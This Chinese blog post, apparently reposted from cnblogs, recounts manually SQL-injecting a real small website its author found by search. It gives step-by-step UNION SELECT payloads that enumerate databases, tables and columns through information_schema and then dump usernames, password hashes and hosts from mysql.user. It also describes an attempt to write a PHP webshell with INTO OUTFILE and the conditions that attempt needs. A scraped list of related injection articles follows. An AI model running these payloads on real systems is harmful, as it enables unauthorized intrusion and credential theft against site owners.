记一次MySQL手工注入
本来想找个装安全狗的站试下绕过,safe dog没找到,但随便一搜搜到一个小站有SQLi,正好借此机会复习下手工注入(新版Firefox我吐槽一下,hackbar这么好用的工具,说阉割就阉割,哎)
小站没有上WAF,用1=1、1=2就可以检测注入点,就不放截图了。
然后order by 、联合查询什么的也都是基本操作。。直接进入最关键的手工爆表好了。(已知第二列和第三列有回显,MySQL version是5.6,所以直接从information_schema中就可以方便的查询)
1、爆其他数据库;
查询语句为:xxx?id=-4 union select 1,SCHEMA_NAME,3,4,5,6,7,8 FROM information_schema.schemata
页面返回为:
2、爆其他表(数据库选择刚才爆出的mysql)
查询语句为:xxx?id=-4 union select 1,TABLE_NAME,3,4,5,6,7,8 FROM information_schema.tables WHERE TABLE_SCHEMA=0x6d7973716c
这里的0x6d7973716c是mysql的十六进制表示,如果直接写mysql字符串的话数据库是不能解析的,所以要传递16进制形式的数据库名
这里有很多表,我们只需关注user表就可以,其实其他的表也会存放一些敏感数据,比如该网站的注册会员的登录信息等等,但我们目标是服务器。
3、爆字段
查询语句为:xxx?id=-4 union select 1,COLUMN_NAME,3,4,5,6,7,8 FROM information_schema.columns WHERE TABLE_NAME=0x75736572
同理,0x75736572是user表的十六进制表示。
这里我们可能关心的是以上三列的数据,user、password、host,让我们进行最后的爆数据吧!
4、爆数据
查询语句为:xxx?id=-4 union select 1,concat_ws(0x2c,User,Password,Host),3,4,5,6,7,8 FROM mysql.user
由于我要查询的有三列数据,所以这里我用了concat_ws函数进行拼接后输出,0x2c是逗号
done,手工测试到此完成,可以说是非常非常普通的正规思路了,没有一点绕过的地方直接搞就行了。
其实这里我尝试用into outfile写php的一句话木马,但是发现没有成功,编码也不行,一直报mysql_fetch_array(): supplied argument is not a valid MySQL result resource的错误。
查了一些资料,使用mysql直接写入木马的必要条件有三:
1、root权限(排除)
2、知道网站根目录的地址(排除,从随便一个报错信息中都可以爆出物理绝对路径)
3、magic_quotes_gpc()=OFF(有可能)
4、没有write权限(有可能)
用sqlmap跑下试试,看来的确如此
大概就这些吧。
#########################
谁能告诉我为什么发布以后布局这么丑,蛋疼
转载于:https://www.cnblogs.com/co10rway/p/7979750.html
记一次MySQL手工注入相关推荐
- mysql 4.0手工注入_手工注入——MySQL手工注入实战和分析
前言 今天进行了MySQL手工注入实战,分享一下自己的实战过程和总结,这里环境使用的是墨者学院的在线靶场.话不多说,咱们直接开始. 判断注入点 通过 ' 和构造 and 1=1 和 and 1=2 查 ...
- mysql报错注入实战_手工注入——MySQL手工注入实战和分析
今天进行了MySQL手工注入实战,分享一下自己的实战过程和总结,这里环境使用的是墨者学院的在线靶场.话不多说,咱们直接开始. 第一步,判断注入点 通过 ' 和构造 and 1=1 和 and 1=2 ...
- SQL注入第二章节MYSQL手工注入
SQL注入第二章节MYSQL手工注入 2.1 SQL注入之sqli-labs环境搭建 一.SQLi-Labs是什么? SQLi-Labs是一个专业的SQL注入练习平台,适用于GET和POST场景,包含 ...
- mysql手工注入imformation_网络安全系列之十八 MySQL基本操作(PHP注入基础)
在之前的博文中曾介绍过如何对ASP网站进行手工注入,ASP网站大都是采用ACCESS或MSSQL数据库,因而所谓针对ASP的SQL注入其实也就是根据ACCESS或MSSQL数据库的特点来构造查询语句. ...
- PHP+MySQL手工注入
1.发现注入点: 202.1.160.100/xycms/showproducts.php?id=12 and 1=1 202.1.160.100/xycms/showproducts.php?id= ...
- mysql 手工sql注入_【sql注入专题02】Mysql手工注入流程
0x00 SQL注入的语句介绍 SQL注入的本质 sql注入的本质就是查询某个数据库下的某个表中的某些字段的内容,比如我们平时在数据库查询一条数据时操作. mysql> use security ...
- MYSQL手工注入某日本网站
经过一天的辛苦劳动下班了,实在无聊,QQ上的基友基本都挂机睡觉了.找点乐子打发时间,看了一下2013年OWASP Top Ten Project, Injection排在第一.去了解注入,还是有必要的 ...
- mysql手工注入imformation_SQL 注入总结
0x01 什么是SQL注入 sql注入就是一种通过操作输入来修改后台操作语句达到执行恶意sql语句来进行攻击的技术. 0x02 SQL注入的分类 按变量类型分 数字型 字符型 按HTTP提交方式分 G ...
- php手工注入语句,PHP+MySQL 手工注入语句大全
我PHP手工太菜了, 无奈只能补下PHP MYSQL手工注射,把收集总结的资料分享下. 暴字段长度 Order by num/* 匹配字段 and 1=1 union select 1,2,3,4,5 ...
最新文章
- 独家 | 关于Spark NLP学习,你需要掌握的 LightPipeline(附代码链接)
- java txt中文乱码,JAVA读取TXT文件 可解决中文乱码问题
- (笔记)电路设计(三)之0欧姆电阻、磁珠、电感的应用
- windows批量创建域用户
- Cenos 软件安装
- 记一次Linux修改MySQL配置不生效的问题
- 类和对象—对象特性—const修饰成员函数
- 分布式系统——网络监视系统zabbix3.4.2,以及向zabbix中添加被监视主机(一)
- java模拟atm 课程设计_急求,关于Java课程设计ATM创建实现
- at java.net.url init,java.net 基本测试
- easyui下datagrid列单独赋值
- 适合初学者入手的vue项目
- 两个HC05蓝牙模块相互之间的通信
- 关系代数 元组关系演算
- 加载webView使用框架AgenWeb
- 计算机音乐苹果手机,iPhone手机音乐如何导出电脑?
- 夏天CPU温度过高原因及解决办法
- 国内外日常上网必备,实用趣味网站合集
- jenkins创建流水线,基于gitlab与Jenkinsfile
- 许永鑫 南京理工大学计算机学院,南京理工大学计算机科学与技术学院研究生导师简介-付安民...
热门文章
- Exynos4412 内核移植(六)—— 设备树解析
- 安卓USB开发教程 二 USB Host
- [react] 在React中组件和元素有什么区别?
- [react] 在React中怎么使用字体图标?
- [html] html5的游戏引擎你了解多少?都有哪些比较好用的引擎呢?
- 工作175:数据在表格横坐标动态显示
- 工作114:传参控制
- “约见”面试官系列之常见面试题之第五十七篇之强制类型转换(建议收藏)
- 前端学习(1407):多人管理27代码优化
- 前端学习(670):分支流程控制if